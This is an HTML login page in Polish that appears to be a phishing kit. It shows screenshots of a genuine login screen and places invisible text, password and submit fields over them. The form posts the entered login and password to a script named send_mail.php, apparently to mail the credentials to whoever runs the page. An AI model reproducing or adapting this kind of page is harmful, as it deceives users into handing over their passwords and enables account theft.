<!DOCTYPE html>
<html lang="pl">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Strona logowania</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            position: relative;
        }

        .container {
            width: 100%;
            max-width: 100%;
            margin: 0 auto;
            position: relative;
        }

        .header,
        .login-form {
            text-align: center;
        }

        .header img {
            width: 100%;
            display: block;
            margin: 0 auto;
        }

        .login-form img {
            width: 95%;
            max-width: 460px;
            display: block;
            margin-left: 16.6%;
            margin-top: 33px;
            margin-bottom: 40px;
        }

        .input-container {
            position: relative;
        }

        .transparent-input {
            position: absolute;
            background: transparent;
            padding: 10px 15px;
            margin: 5px 0;
            width: 340px;
            border: 1px transparent;
            border-radius: 5px;
            outline: none;
            color: #333;
            font-weight: bold;
            font-size: 17px;
        }

        .login-input {
            top: -371px;
            left: 21.7%;
        }

        .password-input {
            top: -283px;
            left: 21.7%;
        }

        /* Styl dla reklamy po prawej stronie */
        .advertisement {
            position: fixed;
            right: 19.7%;
            top: 36.4%;
        }

        .advertisement img {
            width: 300px;
        }

        /* Styl dla przycisku "Zaloguj" */
        .login-button-container {
            position: absolute;
            top: -154px; /* Ustaw przycisk w pionie na środku */
            left: 455px; /* Ustaw przycisk w poziomie na środku */
            transform: translate(-50%, -50%);
            background: transparent;
            border: 2px transparent;
            border-radius: 5px;
	    padding: 20px 200px;
            cursor: auto;
        }

        /* Dodatkowe stylowanie dla przycisku */
        .login-button {
            background: transparent;
            border: none;
            outline: none;
            color: #333;
            font-weight: bold;
            font-size: 18px;
            padding: 20px 40px; /* Dostosuj szerokość i wysokość przycisku według potrzeb */
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="header">
            <img src="naglowek.png" alt="Nagłówek">
        </div>

        <div class="login-form">
            <img src="logowanie.png" alt="Logowanie">
            <form action="send_mail.php" method="POST" class="input-container">
                <input type="text" class="transparent-input login-input" name="login">
                <input type="password" class="transparent-input password-input" name="password">
                <!-- Przycisk "Zaloguj" w nowym kontenerze -->
                <div class="login-button-container">
                    <input type="submit" value="" class="login-button">
                </div>
            </form>
        </div>
    </div>
    <div class="advertisement">
        <img src="reklama.png" alt="Reklama">
    </div>
</body>

</html>

